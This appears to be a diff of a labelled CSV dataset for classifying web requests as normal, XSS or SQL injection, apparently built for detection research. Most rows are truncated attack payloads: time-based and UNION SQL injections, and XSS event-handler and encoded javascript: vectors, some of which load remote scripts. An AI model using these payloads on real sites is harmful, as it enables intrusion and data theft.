) ",2,SQLi,14825 -Where's the best place to find unique items?,0,normal,23899 -><script+src=http://app-e.marketo.com/index.php/fo,1,XSS,9785 -admin') or ('1'='1'#,2,SQLi,9916 +1' ) ) ( select ( case when ( 5451 = 5451 ) then r,2,SQLi,21628 +"<var oncontextmenu=""alert(1)"">test</var>",1,XSS,3647 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,19170 +-2891 where 1770 = 1770 or 9290 = 5866,2,SQLi,14353 +"select * from users where id = 1 or @#"" ( = 1 unio",2,SQLi,12004 +I'm thinking of where to go for a photography sess,0,normal,23751 +`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY,2,SQLi,11188 +"<IMG SRC=""jav&#x0D;ascript:alert(<WBR>'XSS');"">",1,XSS,1698 +-3880 ) or 4144 = ( select upper ( xmltype ( chr (,2,SQLi,22072 +<data id=x tabindex=1 onfocusin=alert(1)></data>,1,XSS,2297 +"1' in boolean mode ) union all select null,null,nu",2,SQLi,14797 +"-8153' where 2436 = 2436 union all select 2436,243",2,SQLi,14699 +"<label onbeforecut=""alert(1)"" contenteditable>test",1,XSS,5942 +"During deposition, Trump has admitted that he did ",0,normal,26223 +or 1=1;#,2,SQLi,9971 +"))) and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,11036 +<style>:target {color: red;}</style><audio id=x st,1,XSS,3316 +1 ( select ( case when ( 5451 = 5451 ) then regexp,2,SQLi,21168 +"1%"" ) and 3580 = ( select count ( * ) from domain.",2,SQLi,14827 +"{""id"":null,""name"":""smaller""}",0,normal,27127 +><script+src=https://suggest.taobao.com/sug?callba,1,XSS,9787 +admin') or '1'='1,2,SQLi,9918 <script>Object.prototype.preventDefault='x'; Objec,1,XSS,216 -Select movie.,0,normal,23092 -&#x0003c,1,XSS,1073 -"<picture onmouseout=""alert(1)"">test</picture>",1,XSS,8683 -A register address select line 91 provides a contr,0,normal,26432 -"1', ( select * from generate_series ( 2636,2636,ca",2,SQLi,19868 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7007 -1' where 6902 = 6902 and 6055 = ctxsys.drithsx.sn ,2,SQLi,21487 -select pg_sleep ( 5 ) # pjvi,2,SQLi,13380 -Update your profile details with accuracy.,0,normal,22984 -1'|| ( select 'yyil' from dual where 3121 = 3121,2,SQLi,20149 -"<input draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,8653 -Select a spot.,0,normal,22795 -1' order by 1--,2,SQLi,13706 -1'+ ( select pxsd where 2576 = 2576 or updatexml (,2,SQLi,15385 -<body onpageshow=alert(1)>,1,XSS,26 -"{""id"":null,""firstName"":""Toh"",""lastName"":""Munsing"",",0,normal,26819 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10602 -"<th onmouseenter=""alert(1)"">test</th>",1,XSS,7660 --5152' ) ) or 4747 = dbms_utility.sqlid_to_sqlhash,2,SQLi,13402 -<body onpointerleave=alert(1)>XSS</body>,1,XSS,5691 -style=xss:expression(alert(1)),1,XSS,9745 -"{""id"":null,""name"":""again""}",0,normal,27544 -"Section II of the act ordered, inter alia, that th",0,normal,25693 -Create drawing.,0,normal,23068 -select ( case when ( 3863 = 1151 ) then 3863 else ,2,SQLi,12722 -"<foreignObject xlink:href=""javascript:alert(88)""/>",1,XSS,9172 -)%20waitfor%20delay%20'0:0:20'%20--,2,SQLi,10848 -"select * from users where id = 1 or 1#"". = 1 union",2,SQLi,11909 +Filter list.,0,normal,23094 +&#x00003c,1,XSS,1074 +"""><iframe src=""javascript:alert()"">",1,XSS,8685 +"A third, related factor was England's decision to ",0,normal,26429 +1%' ) ) ) union all select null#,2,SQLi,19870 +<style>:target {transform: rotate(180deg);}</style,1,XSS,7009 +"1"" ) where 4913 = 4913",2,SQLi,21489 +1' ) as siyk where 1514 = 1514 union all select nu,2,SQLi,13382 +Insert the SIM card tray into the phone.,0,normal,22986 +"1%"" ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99",2,SQLi,20151 +<source onblur=alert(1) tabindex=1 id=x></source><,1,XSS,8655 +Filter search results.,0,normal,22797 +1' ) ) ) and 5615 = 5458--,2,SQLi,13708 +"1"" ) or 8466 = benchmark ( 5000000,md5 ( 0x694a474",2,SQLi,15387 +<body onpageshow=alert(1)>,1,XSS,26 +"{""id"":null,""firstName"":""Vicky"",""lastName"":""He"",""ad",0,normal,27409 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10604 +"<base draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,7662 +-8971'|| ( select 'smyx' where 7970 = 7970 union a,2,SQLi,13404 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5693 +A” autofocus onfocus=alert(“XSS”)//,1,XSS,9747 +where,0,normal,26529 +select,0,normal,25690 +Insert text.,0,normal,23070 +1 ) or 7552 = ( select count ( * ) from rdb$fields,2,SQLi,12724 +<form>,1,XSS,9174 +""")%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10850 +AND 1 = utl_inaddr.get_host_address ( ( SELECT COU,2,SQLi,11911 "<comment><img src=""</comment><img src=x onerror=ja",1,XSS,631 -"-5054%"" ) ) ) union all select 8263,8263,8263,8263",2,SQLi,21608 -"Plus, with Select and Go, you can select the rooms",0,normal,25769 -<style>:target {color:red;}</style><li id=x style=,1,XSS,8708 -Select log.,0,normal,24631 -"<base onkeydown=""alert(1)"" contenteditable>test</b",1,XSS,6615 -<h1 onpointerover=alert(1)>XSS</h1>,1,XSS,5244 -"&lt;IMG SRC=`javascript&#058;alert(\""RSnake says, ",1,XSS,1103 -1%' ) ) and 5556 = ( select count ( * ) from all_u,2,SQLi,19661 -"1"" ) ) ) or 8315 = ( select count ( * ) from sysib",2,SQLi,21730 -"<plaintext onkeydown=""alert(1)"" contenteditable>te",1,XSS,2205 -"{""id"":null,""firstName"":""Krisalya"",""lastName"":""Zaki",0,normal,27323 -1' or 2633 = dbms_pipe.receive_message ( chr ( 112,2,SQLi,12904 -or 1 in ( select @@version ) --,2,SQLi,11478 -) IF (1=1) WAITFOR DELAY '0:0:5'--,2,SQLi,11309 -1 ) as cejp where 4736 = 4736 or 5286 = ( select c,2,SQLi,13768 -1 ) ) ) and 6414 = ( select count ( * ) from rdb$f,2,SQLi,15065 -1'|| ( select 'rfjl' where 2476 = 2476 or 7552 = (,2,SQLi,12513 -Where's the martial arts dojo?,0,normal,23601 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,21610 +Previous research has found that food packaging af,0,normal,25766 +"<dd onkeyup=""alert(1)"" contenteditable>test</dd>",1,XSS,8710 +They'll select the leader.,0,normal,24284 +"<img draggable=""true"" ondrag=""alert(1)"">test</img>",1,XSS,6617 +<style>@keyframes slidein {}</style><textarea styl,1,XSS,5246 +&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;),1,XSS,1104 +-4015'|| ( select 'qeqv' from dual where 1437 = 14,2,SQLi,19663 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,21732 +"<style>@keyframes x{}</style><dt style=""animation-",1,XSS,2206 +"{""id"":null,""name"":""Roggenrola""}",0,normal,27322 +"iif ( 1157 = 4542,1,1/0 )",2,SQLi,12906 +select * from users where id = 1 ||1 union select ,2,SQLi,11480 +WAITFOR DELAY '0:0:5'--,2,SQLi,11311 +1 ) ) ) and 8407 = ( select count ( * ) from gener,2,SQLi,13770 +1' in boolean mode ) or sleep ( 5 ) #,2,SQLi,15067 +1 ) ) ) and 3580 = ( select count ( * ) from domai,2,SQLi,12515 +Where's the swimming pool?,0,normal,23598 "{""id"":null,""firstName"":""Siew"",""lastName"":""Peiying""",0,normal,27609 --9120' ) ) or 8571 = 8571--,2,SQLi,18592 -1 ) ) as vmwj where 5597 = 5597,2,SQLi,20937 -1' ) ( select ( case when ( 5451 = 5451 ) then reg,2,SQLi,20787 -"1%"" ) ) ) or 2633 = dbms_pipe.receive_message ( ch",2,SQLi,20103 -"1' ) union all select null,null--",2,SQLi,17357 -1%' or 8156 = ( select count ( * ) from generate_s,2,SQLi,20964 -Sort alphabetically the documents on your desk.,0,normal,22901 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,14891 +-9389' ) or 8859 = 3989--,2,SQLi,18594 +1' ) as sruz where 6318 = 6318,2,SQLi,20939 +1 and 6414 = ( select count ( * ) from rdb$fields ,2,SQLi,20789 +1'+ ( select nvht where 9118 = 9118 or 8315 = ( se,2,SQLi,20105 +-2733' ) ) ) or 4144 = ( select upper ( xmltype ( ,2,SQLi,17359 +-6178 ) ) as lygb where 9559 = 9559 or ( 8459 = 84,2,SQLi,20966 +Insert fresh batteries into the remote control.,0,normal,22903 +-2549' ) as zfnf where 1993 = 1993 union all selec,2,SQLi,14893 1<animate/xmlns=urn:schemas-microsoft-com:time sty,1,XSS,720 -"1 union all select null,null,null#",2,SQLi,13840 -<mark onpointerout=alert(1)>XSS</mark>,1,XSS,6156 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,20094 -1%' ) and char ( 120 ) ||char ( 106 ) ||char ( 117,2,SQLi,19188 -select sleep ( 5 ) and ( 4863 = 4863,2,SQLi,18951 -<base id=x tabindex=1 onfocus=alert(1)></base>,1,XSS,4026 -Select your favorite song.,0,normal,22583 -"<th draggable=""true"" ondragend=""alert(1)"">test</th",1,XSS,8225 -1 ) as nwfz where 7365 = 7365 and 4386 = utl_inadd,2,SQLi,17909 -"-6126 union all select 8486,8486,8486,8486,8486,84",2,SQLi,20448 -"1 ) or ( select 9173 from ( select count ( * ) ,co",2,SQLi,15494 -1'+ ( select basp where 6953 = 6953,2,SQLi,19177 -1'|| ( select 'sbip' from dual where 7302 = 7302 a,2,SQLi,16094 -"-4230"" ) ) ) union all select 6962,6962,6962,6962,",2,SQLi,18607 -<shadow id=x tabindex=1 ondeactivate=alert(1)></sh,1,XSS,5819 -""" ) or ( ""x"" ) = ( ""x",2,SQLi,11957 -"<rt onpaste=""alert(1)"" contenteditable>test</rt>",1,XSS,3867 -Where's the vacation home?,0,normal,23557 -<rb onpointerleave=alert(1)>XSS</rb>,1,XSS,2746 -"select * from users where id = 1 or 1#""1 union sel",2,SQLi,11868 -"and (select substring(@@version,2,1))='i'",2,SQLi,10344 -Select a song to play.,0,normal,24158 -"x' AND 1 = ( SELECT COUNT ( * ) FROM tabname ) ,",2,SQLi,11951 -Select your determine.,0,normal,25000 -"-7324 ) or make_set ( 8486 = 6544,6544 )",2,SQLi,19612 -"<a oncut=""alert(1)"" contenteditable>test</a>",1,XSS,4215 -"-9606 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( ",2,SQLi,20308 -1'|| ( select 'rawn' from dual where 4988 = 4988 o,2,SQLi,12097 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,15194 -"-4736' ) ) or elt ( 5835 = 5509,5509 ) and ( ( 'ia",2,SQLi,19644 -&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;aler,1,XSS,1402 -"1"" ) as zhlf where 4119 = 4119 or 5286 = ( select ",2,SQLi,12829 -"1%"" ) ) ) and 7756 = dbms_utility.sqlid_to_sqlhash",2,SQLi,21364 -"<title onkeydown=""alert(1)"" contenteditable>test</",1,XSS,3254 -Save up to 55% off select Muscle Tech Sports Nutri,0,normal,25709 -"-5761"" ) or 3762 = 1274",2,SQLi,19046 -"<dialog draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,2159 -"<blockquote onpaste=""alert(1)"" contenteditable>tes",1,XSS,8579 -( select ( case when ( 5792 = 5792 ) then 5792 els,2,SQLi,17059 -Select the appropriate filter for the water.,0,normal,24163 -"<section onkeyup=""alert(1)"" contenteditable>test</",1,XSS,7012 -Where's the best place to go for a hike?,0,normal,23732 -"<>""'%;)(&+",2,SQLi,10198 -"<dd onkeydown=""alert(1)"" contenteditable>test</dd>",1,XSS,3842 -1'+ ( select ksoh where 6339 = 6339,2,SQLi,18200 -1' ) ) and ( select 9067 from ( select count ( * ),2,SQLi,19558 -"-9684"" order by 1#",2,SQLi,20133 -"select * from users where id = 1 or ""{#"" or 1 = 1 ",2,SQLi,11850 -"<ul draggable=""true"" ondragend=""alert(1)"">test</ul",1,XSS,2101 -Modify text.,0,normal,23093 -"<;A HREF="";//google"";>;XSS<;/A>;",1,XSS,1674 -ORDER BY 21#,2,SQLi,10294 -<style>@keyframes slidein {}</style><colgroup styl,1,XSS,4214 -"<multicol draggable=""true"" ondragleave=""alert(1)"">",1,XSS,7481 -"1' ) and 8148 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,17933 -"-9996' or make_set ( 1237 = 7111,7111 )",2,SQLi,14563 -Where's the club?,0,normal,23545 -select * from users where id = 1.&&1 union select ,2,SQLi,11516 -"<hr onbeforecut=""alert(1)"" contenteditable>test</h",1,XSS,8548 --8667'+ ( select ymmg where 6132 = 6132 union all ,2,SQLi,21569 --6680' ) or 5483 = 3031 and ( 'zxes' = 'zxes,2,SQLi,17846 -"1"" ) or 8315 = ( select count ( * ) from sysibm.sy",2,SQLi,14824 -1%' ) ( select ( case when ( 5451 = 5451 ) then re,2,SQLi,16924 -"-3378%"" ) ) union all select 9357,9357,9357,9357,9",2,SQLi,19605 -1'|| ( select 'ypil' from dual where 4568 = 4568 o,2,SQLi,16364 -Insert the video.,0,normal,22854 -"-4394' ) ) union all select 3409,3409--",2,SQLi,14610 -"1%"" ) ) rlike sleep ( 5 ) and ( ( ""%"" = """,2,SQLi,18136 -1 ) ) or 1022 = ( select count ( * ) from all_user,2,SQLi,20361 -"-3013' ) where 2027 = 2027 union all select 2027,2",2,SQLi,18157 -"[alert][0].call(this,1)",1,XSS,9389 -@var select @var as var into temp end --,2,SQLi,10071 -"),NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10861 -"-8331' ) union all select 1452,1452,1452,1452,1452",2,SQLi,18401 -"<em onclick=""alert(1)"">test</em>",1,XSS,2006 -1 ) ) as qfnu where 1609 = 1609 and 8189 = ( selec,2,SQLi,20278 -1' ) ) and sleep ( 5 ) #,2,SQLi,19622 -1' ) as ghvi where 3880 = 3880 and 4595 = 4595#,2,SQLi,20809 -"-6772"" ) ) or 9323 = 9323#",2,SQLi,15888 -1' ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ,2,SQLi,15234 -"1%"" or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,13412 -<frame onpointerleave=alert(1)>XSS</frame>,1,XSS,2258 -Where's the makeup artist?,0,normal,23643 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,20457 -"<embed oncopy=""alert(1)"" contenteditable>test</emb",1,XSS,5575 -"<body style=""background:gray"">",1,XSS,9084 -"{""id"":null,""firstName"":""Raymond"",""lastName"":""Yi"",""",0,normal,26950 -"<object draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,5356 -"<section draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,6094 -"<time onkeypress=""alert(1)"" contenteditable>test</",1,XSS,7936 -Select your challenge.,0,normal,24919 -<? echo('<SCR)';echo('IPT>document.vulnerable=true,1,XSS,1520 -1,0,normal,26688 -&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:ale,1,XSS,1379 -"1%"" ) ) or 2367 = ( select count ( * ) from rdb$fi",2,SQLi,22057 -"1"" where 9173 = 9173 rlike ( select ( case when ( ",2,SQLi,18972 -"1"" where 3692 = 3692 union all select null,null--",2,SQLi,15207 -1' ) ) ) or 2633 = dbms_pipe.receive_message ( chr,2,SQLi,21808 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,22006 -Select refresh.,0,normal,24626 -1 ) ) ) or exp ( ~ ( select * from ( select concat,2,SQLi,13201 -"Why, he might ask, should he not select the simple",0,normal,25120 -"<template draggable=""true"" ondragenter=""alert(1)"">",1,XSS,5843 -"<rtc draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,7123 -"-8200%"" ) ) union all select 7538,7538,7538#",2,SQLi,16212 -1'+ ( select ohqr where 5610 = 5610,2,SQLi,12821 -"<footer onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,5833 -javascript:alert(1)//INJECTX,1,XSS,9822 -"-5082 ) ) union all select 4013,4013,4013,4013,401",2,SQLi,21273 -"-4588"" union all select 4550,4550,4550,4550#",2,SQLi,12719 -select ( case when ( 8993 = 4660 ) then 1 else 899,2,SQLi,22289 +"1"" ) ) as tfjh where 1134 = 1134 and 8635 = ( sele",2,SQLi,13842 +<s id=x tabindex=1 onfocusin=alert(1)></s>,1,XSS,6158 +1 ) and 6510 = ( select count ( * ) from sysusers ,2,SQLi,20096 +1' ) ) as qhpv where 7049 = 7049 and make_set ( 84,2,SQLi,19190 +1 ) ) as lkqx where 6468 = 6468 or ( select * from,2,SQLi,18953 +"<frame oncontextmenu=""alert(1)"">test</frame>",1,XSS,4028 +Plant a fragrant rose.,0,normal,22585 +<section id=x tabindex=1 ondeactivate=alert(1)></s,1,XSS,8227 +"1%' ) and make_set ( 1458 = 3902,3902 ) and ( '%' ",2,SQLi,17911 +"1"" ) and ( select 2* ( if ( ( select * from ( sele",2,SQLi,20450 +"-5073"" ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 11",2,SQLi,15496 +-8486%' ) ) ) or 8571 = 8571--,2,SQLi,19179 +1' ) ) as hzbj where 1725 = 1725 or sleep ( 5 ) #,2,SQLi,16096 +1 ) as lfra where 2669 = 2669 and updatexml ( 3393,2,SQLi,18609 +"<audio onmousemove=""alert(1)"">test</audio>",1,XSS,5821 +"select * from users where id = 1 or ""@;"" = 1 or 1 ",2,SQLi,11959 +<header onblur=alert(1) tabindex=1 id=x></header><,1,XSS,3869 +1,0,normal,26712 +<center id=x tabindex=1 ondeactivate=alert(1)></ce,1,XSS,2747 +select * from users where id = 1 -@<@ union select,2,SQLi,11870 +"and (select substring(@@version,3,1))='c'",2,SQLi,10346 +Select the ideal spot for a picnic.,0,normal,24155 +select * from users where id = 1 or \.<$ union sel,2,SQLi,11953 +Select your verify.,0,normal,24997 +"1%"" ) or updatexml ( 1808,concat ( 0x2e,0x7171706a",2,SQLi,19614 +<figcaption onfocusout=alert(1) tabindex=1 id=x></,1,XSS,4217 +-6823' ) ) ) or 4493 = utl_inaddr.get_host_address,2,SQLi,20310 +"1"" ) ) as dnhd where 2657 = 2657 or 4240 = ( selec",2,SQLi,12099 +1%' ) ) ) waitfor delay '0:0:5' and ( ( ( '%' = ',2,SQLi,15196 +"-1368 ) ) union all select 1310,1310,1310,1310,131",2,SQLi,19646 +&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&a,1,XSS,1403 +1' ) ) ) and 8514 = ( select count ( * ) from doma,2,SQLi,12831 +"-5211"" ) ) as bkvr where 4082 = 4082 or 2323 = 805",2,SQLi,21366 +<head id=x tabindex=1 ondeactivate=alert(1)></head,1,XSS,3256 +Save up to 69% off select Logitech PC Gaming & Pro,0,normal,25706 +"-8546' union all select 4729,4729,4729,4729,4729,4",2,SQLi,19048 +<summary onpointerdown=alert(1)>XSS</summary>,1,XSS,2160 +<multicol onpointerup=alert(1)>XSS</multicol>,1,XSS,8581 +"-1894' ) union all select 8123,8123,8123,8123,8123",2,SQLi,17061 +Select a quote for inspiration.,0,normal,24160 +<style>:target {color: red;}</style><param id=x st,1,XSS,7014 +Let's choose a gift for the special occasion.,0,normal,23729 +OR 1=0,2,SQLi,10200 +"<figcaption draggable=""true"" ondragstart=""alert(1)",1,XSS,3844 +"1' ) or extractvalue ( 1297,concat ( 0x5c,0x717170",2,SQLi,18202 +"1%"" ) ) ) procedure analyse ( extractvalue ( 9255,",2,SQLi,19560 +-1579%' ) ) ) union all select 7272#,2,SQLi,20135 +select * from users where id = 1 or 1<@ = 1 union ,2,SQLi,11852 +document.URL,1,XSS,2102 +Select link.,0,normal,23095 +"<;A HREF="";http://ha.ckers.org@google"";>;XSS<;/A>;",1,XSS,1675 +ORDER BY 23#,2,SQLi,10296 +"<big onbeforecopy=""alert(1)"" contenteditable>test<",1,XSS,4216 +<style>@keyframes slidein {}</style><progress styl,1,XSS,7483 +"1"" union all select null,null,null,null,null,null,",2,SQLi,17935 +-6815 where 7609 = 7609 or 1 group by concat ( 0x7,2,SQLi,14565 +Select a coffee roast for your morning cup.,0,normal,24161 +select * from users where id = 1 + ( \ ) union sel,2,SQLi,11518 +"<param onmouseover=""alert(1)"">test</param>",1,XSS,8550 +-2223' ) ) as mjwp where 8650 = 8650 or 7900 = 583,2,SQLi,21571 +"1' and 8148 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,17848 +"-5158' ) ) or make_set ( 9354 = 9354,7185 ) and ( ",2,SQLi,14826 +"-9966' ) ) union all select 7230,7230,7230,7230,72",2,SQLi,16926 +waitfor delay '0:0:5' ) +',2,SQLi,19607 +1' ) and 3754 = ( select upper ( xmltype ( chr ( 6,2,SQLi,16366 +Modify the image.,0,normal,22856 +1' ) where 1645 = 1645 rlike sleep ( 5 ) --,2,SQLi,14612 +"end and ( ( ( ""memh"" like ""memh",2,SQLi,18138 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,20363 +1'+ ( select qjng where 1897 = 1897 and 6414 = ( s,2,SQLi,18159 +"window['a'+'l'+'e'+'r'+'t'].call(this,1)",1,XSS,9391 +"a"""" or 3=3--""",2,SQLi,10073 +"""),NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10863 +1' ) ) ) or 7552 = ( select count ( * ) from rdb$f,2,SQLi,18403 +"<style>@keyframes x{}</style><rtc style=""animation",1,XSS,2007 +1' ) and 3754 = ( select upper ( xmltype ( chr ( 6,2,SQLi,20280 +"1"" and 7533 = 7533 and ""dqjp"" = ""dqjp",2,SQLi,19624 +1 ) ) or 5286 = ( select count ( * ) from all_user,2,SQLi,20811 +1 where 7452 = 7452 or 4240 = ( select 4240 from p,2,SQLi,15890 +"1"" ) ) and ( 7467 = 7962 ) *7962 and ( ( ""nhld"" = ",2,SQLi,15236 +1' ) ) as ngoo where 8641 = 8641 and 5556 = ( sele,2,SQLi,13414 +<xmp id=x tabindex=1 ondeactivate=alert(1)></xmp><,1,XSS,2259 +Where's the wellness spa?,0,normal,23640 +-5803 ) where 8651 = 8651 or 4493 = utl_inaddr.get,2,SQLi,20459 +"<title onclick=""alert(1)"">test</title>",1,XSS,5577 +"<body><a href=""#"" onclick=""makePopups()"">Spam</a>/",1,XSS,9086 +"{""id"":null,""firstName"":"""",""lastName"":""Brolagda"",""s",0,normal,26947 +"<object draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,5358 +<tbody onpointerenter=alert(1)>XSS</tbody>,1,XSS,6096 +"<progress onkeypress=""alert(1)"" contenteditable>te",1,XSS,7938 +Select your war.,0,normal,24916 +"<meta HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCR",1,XSS,1521 +1,0,normal,26685 +&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&ap,1,XSS,1380 +"1"" ) where 7548 = 7548",2,SQLi,22059 +1 ) where 3030 = 3030,2,SQLi,18974 +"-2423' ) ) ) union all select 8256,8256,8256,8256,",2,SQLi,15209 +1' and 6510 = ( select count ( * ) from sysusers a,2,SQLi,21810 +"1"" ) as xaye where 5343 = 5343 and 4355 = 7475#",2,SQLi,22008 +Select minimize.,0,normal,24623 +-4952' ) ) ) or 4747 = dbms_utility.sqlid_to_sqlha,2,SQLi,13203 +Williams Sonoma Home: 20% off select living room f,0,normal,25117 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5845 +"<q oncontextmenu=""alert(1)"">test</q>",1,XSS,7125 +"-5802' ) ) ) union all select 6286,6286,6286,6286#",2,SQLi,16214 +"1' ) and make_set ( 8403 = 8403,8899 ) and ( 'ojag",2,SQLi,12823 +<style>:target {color:red;}</style><iframe id=x st,1,XSS,5835 +<img onload=alert(1)>//INJECTX,1,XSS,9824 +1' ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240,2,SQLi,21275 +1 ) ) ) or ( select * from ( select ( sleep ( 5 ) ,2,SQLi,12721 +"1"" ) union all select null,null,null,null,null,nul",2,SQLi,22291 "<a href=""\xE2\x80\x84javascript:javascript:alert(1",1,XSS,523 -1 ) ) ) union all select null#,2,SQLi,19992 -"-3834' ) ) ) union all select 8313,8313--",2,SQLi,15373 +"1, ( select 9100 = ( 'qqpjq'|| ( select case 9100 ",2,SQLi,19994 +1 ) ) as juoe where 9994 = 9994 or 2367 = ( select,2,SQLi,15375 "<a href=""javascript&colon;alert(1)"">Firefox</a>",1,XSS,235 -1 ) and 4595 = 4595#,2,SQLi,12181 -1 ) where 4866 = 4866,2,SQLi,20181 -"<font onmouseleave=""alert(1)"">test</font>",1,XSS,6319 -Where is my book?,0,normal,23479 -"select * from users where id = 1 or 1#""? = 1 union",2,SQLi,11993 -Select the name of the profile you wish to delete.,0,normal,25590 -<i id=x tabindex=1 ondeactivate=alert(1)></i><inpu,1,XSS,1949 -<noframes onpointerdown=alert(1)>XSS</noframes>,1,XSS,6362 -"{""id"":null,""firstName"":""Xie"",""lastName"":""Jinhuang""",0,normal,26806 -"Simply add the items you want, select the most app",0,normal,25551 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11685 -1' ) ) ) and sleep ( 5 ) and ( ( ( 'vbck' like 'vb,2,SQLi,22476 -1 ) ) as jyfo where 8121 = 8121 and 9254 = ( selec,2,SQLi,15928 -"{""id"":null,""firstName"":""Krisalya"",""lastName"":""Zaki",0,normal,27336 -"<embed onclick=""alert(1)"">test</embed>",1,XSS,2225 -"{""id"":null,""firstName"":""Suan Choo"",""lastName"":""Lee",0,normal,27362 --7194'|| ( select 'gbrx' from dual where 6205 = 62,2,SQLi,15247 -1 ) and sleep ( 5 ) and ( 4855 = 4855,2,SQLi,16210 -"<strike onmousedown=""alert(1)"">test</strike>",1,XSS,5572 -<style>@keyframes slidein {}</style><listing style,1,XSS,4524 -"<fieldset draggable=""true"" ondragstart=""alert(1)"">",1,XSS,5794 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,20617 -<sup onpointermove=alert(1)>XSS</sup>,1,XSS,5739 -"-5008' union all select 1942,1942,1942,1942,1942,1",2,SQLi,19009 -"<wbr ondblclick=""alert(1)"">test</wbr>",1,XSS,4729 -"<element draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,7819 -"<main onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,8860 +"-5224' ) where 1962 = 1962 union all select 1962,1",2,SQLi,12183 +"1"" and ( select 2* ( if ( ( select * from ( select",2,SQLi,20183 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6321 +Where did they go?,0,normal,23481 +"select * from users where id = 1 or "";&"" or 1 = 1 ",2,SQLi,11995 +Select the Pen icon and the Master icon to alter t,0,normal,25587 +"<table draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,1950 +"<pre onkeydown=""alert(1)"" contenteditable>test</pr",1,XSS,6364 +"{""id"":null,""name"":""meat""}",0,normal,26803 +"Simply select a friend, press the Bitmoji button o",0,normal,25548 +",waitfor delay '0:0:__TIME__'--",2,SQLi,11687 +"-8609%"" ) ) ) union all select 6021,6021,6021,6021",2,SQLi,22478 +1'+ ( select hsef where 4136 = 4136 or 8421 = ( se,2,SQLi,15930 +And data protection for a select elite doesn't sou,0,normal,26368 +<map id=x tabindex=1 onfocus=alert(1)></map>,1,XSS,2226 +But obscurity implies that a meme exists within a ,0,normal,26307 +-2936 ) or 6872 = 6872,2,SQLi,15249 +"-8200%"" ) ) union all select 7538,7538,7538#",2,SQLi,16212 +"<option onmouseup=""alert(1)"">test</option>",1,XSS,5574 +"<bdo onmousedown=""alert(1)"">test</bdo>",1,XSS,4526 +<ruby onpointerenter=alert(1)>XSS</ruby>,1,XSS,5796 +"-2321%"" ) or 2271 = 7683--",2,SQLi,20619 +<head id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,5741 +"1' ) ) union all select null,null,null,null,null,n",2,SQLi,19011 +"<col onkeydown=""alert(1)"" contenteditable>test</co",1,XSS,4731 +"<output draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,7821 +"<A HREF=""http://66.102.7.147/""></A>",1,XSS,8862 "{""id"":null,""firstName"":""Kiew Mooi"",""lastName"":""Cha",0,normal,27506 -"1' ) ) and elt ( 4249 = 4249,7259 ) and ( ( 'oucg'",2,SQLi,22336 -"-3873%' ) ) or 1 group by concat ( 0x7171706a71, (",2,SQLi,15276 -I'm planning to pick up some gardening tools.,0,normal,23882 -<meta onpointerout=alert(1)>XSS</meta>,1,XSS,2438 -"-1504"" ) as wpes where 6256 = 6256 union all selec",2,SQLi,22441 -"1"" ) as tuem where 1328 = 1328",2,SQLi,14088 -Update your email signature.,0,normal,22737 -select * from users where id = 1 + @`\` union sele,2,SQLi,11990 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3168 -select ( case when ( 5142 = 6855 ) then 5142 else ,2,SQLi,18194 -Select your conflict.,0,normal,24913 -Where's the hotel?,0,normal,23546 -"select pg_sleep ( 5 ) and ( ""tpry"" = ""tpry",2,SQLi,21471 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,13753 -1%' ) ) or 4240 = ( select 4240 from pg_sleep ( 5 ,2,SQLi,15921 -"1"" where 2309 = 2309 or elt ( 5873 = 5873,sleep ( ",2,SQLi,14028 -<element id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,7017 -"1"" where 9135 = 9135 and elt ( 4249 = 4249,7259 ) ",2,SQLi,13387 --2790' ) ) or 8571 = 8571--,2,SQLi,15999 -"iif ( 9190 = 5059,1,1/0 )",2,SQLi,12642 -Select the finest wine.,0,normal,24468 